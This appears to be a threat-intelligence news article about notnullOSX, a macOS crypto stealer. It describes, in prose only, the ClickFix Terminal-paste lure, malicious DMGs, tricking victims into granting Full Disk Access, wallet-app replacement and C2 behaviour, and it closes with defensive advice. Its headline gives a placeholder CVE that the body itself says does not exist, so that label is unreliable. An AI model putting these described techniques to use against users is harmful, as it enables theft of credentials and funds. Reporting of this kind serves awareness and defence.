ClickFix macOS Vulnerability (CVE-2023-XXXX) Lets Attackers Deliver notnullOSX
Key Takeaways A new macOS information stealer, notnullOSX, has emerged, specifically targeting cryptocurrency holders with balances exceeding $10,000. The malware employs social engineering via a...
Key Takeaways
- A new macOS information stealer, notnullOSX, has emerged, specifically targeting cryptocurrency holders with balances exceeding $10,000.
- The malware employs social engineering via a “ClickFix” method or malicious DMG files to bypass macOS security and gain Full Disk Access.
- Developed by an individual known as 0xFFF, now operating as alh1mik, the stealer is highly targeted, with operators manually vetting victims through an affiliate panel.
- notnullOSX uses a modular design to steal various data, including cryptocurrency wallet details, browser credentials, messages, and can even replace legitimate hardware wallet applications.
- No specific CVE ID for the “ClickFix” social engineering method was provided in the source material, but the threat is active and requires immediate user vigilance.
A sophisticated new macOS information stealer, dubbed notnullOSX, has been identified, focusing its attacks on cryptocurrency investors holding over $10,000 in their digital wallets. Written in the Go programming language, this malware leverages two distinct infection vectors—a social engineering tactic referred to as “ClickFix” and the distribution of malicious Disk Image (DMG) files—to covertly compromise Apple Mac systems.
Table Of Content
The operation behind notnullOSX is characterized by its precise targeting. Threat actors meticulously select each victim through a dedicated affiliate panel before initiating an attack, ensuring a high potential return on their efforts.
The Evolution of notnullOSX
The origins of notnullOSX trace back to 2022, when a developer known as 0xFFF first showcased an early version of a macOS stealer on underground hacking forums. Following a reported exit from the scene in 2023, allegedly due to a rival’s fabricated law enforcement tip, 0xFFF resurfaced in August 2024 under the new alias “alh1mik.” The individual issued an apology and began accepting preorders for a refined macOS stealer at a monthly subscription cost of $400. By 2026, this offering had materialized into the notnullOSX malware.
Researchers at Moonlock Lab recorded the first detections of notnullOSX on March 30, 2026, observing activity in Vietnam, Taiwan, and Spain. Their analysis confirmed the malware’s highly targeted nature. Before any attack, operators are required to submit a form detailing the victim’s social media profiles, cryptocurrency wallet addresses, and communication history. Submissions for victims with wallet balances below $10,000 are automatically rejected.
Initial Infection Chains
The attack typically commences with a deceptive Google document, which presents an encryption error and prompts the victim to choose one of two actions, both ultimately leading to malware installation. The first method, “ClickFix,” instructs the user to open Terminal and paste a base64-encoded command. This command surreptitiously retrieves and executes a remote bash installer script. The second approach involves a malicious DMG disk image, disguised as a routine file with a README, an installation script, and a Terminal shortcut. In both scenarios, victims unknowingly install the malware without triggering any security alerts.
The distribution infrastructure for notnullOSX extends to a fake product page for a wallpaper application named WallSpace, hosted at wallpapermacos[.]com. This page features professional screenshots and a prominent “free download” button. Furthermore, a long-dormant YouTube channel, inactive since 2015, was hijacked to promote the fake app. A single video on this channel garnered 50,000 views in just two weeks, suggesting either paid promotion or sophisticated SEO manipulation.
Inside the Attack: TCC Bypass and Modular Data Theft
A critical aspect of notnullOSX’s danger lies in its ability to subvert macOS’s native permission system. Apple’s Transparency, Consent, and Control (TCC) framework typically generates pop-up prompts when applications attempt to access sensitive user data, such as messages, notes, or browser cookies. notnullOSX circumvents this by manipulating victims into manually granting “Full Disk Access” within System Settings.
Granting this single permission bypasses all subsequent TCC prompts, allowing the malware unfettered access to all protected data categories without further user interaction. The malware employs a modular architecture, downloading specific binaries from its command-and-control (C2) server for each data exfiltration task. Identified modules include iMessageGrab, AppleNotesGrab, CryptoWalletsGrab, BrowserGrab, TelegramGrab, CredsGrab, and ReplaceApp.
The “ReplaceApp” module is particularly concerning. It silently substitutes legitimate hardware wallet applications, such as Ledger Live, with trojanized versions. These malicious clones are designed to intercept seed phrases during the setup process, thus compromising even users who rely on the enhanced security of hardware wallets, as long as the managing software on their Mac is compromised.
Beyond data theft, notnullOSX maintains a persistent WebSocket connection to a Firebase-hosted C2 server. It sends regular heartbeats and awaits remote commands, exhibiting behavior more akin to a full-fledged remote access trojan (RAT) than a simple, one-time information stealer.
What You Should Do
- For Security Teams: Block outbound connections to known C2 domains associated with notnullOSX. Implement alerts for any unrecognized applications requesting Full Disk Access. Monitor the
/tmpdirectory for the staging of Mach-O binaries. - For Mac Users and Cryptocurrency Holders: Never paste Terminal commands from untrusted sources, such as web pages or documents. Exercise extreme caution with any application that requests Full Disk Access during installation, especially if its origin is unclear. Regularly inspect
~/Library/LaunchAgents/for any unfamiliar or suspicious entries. - Practice General Cyber Hygiene: Keep your macOS operating system and all applications updated to the latest versions. Use strong, unique passwords and enable multi-factor authentication (MFA) wherever possible. Be wary of phishing attempts and suspicious links.
Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.



No Comment! Be the first one.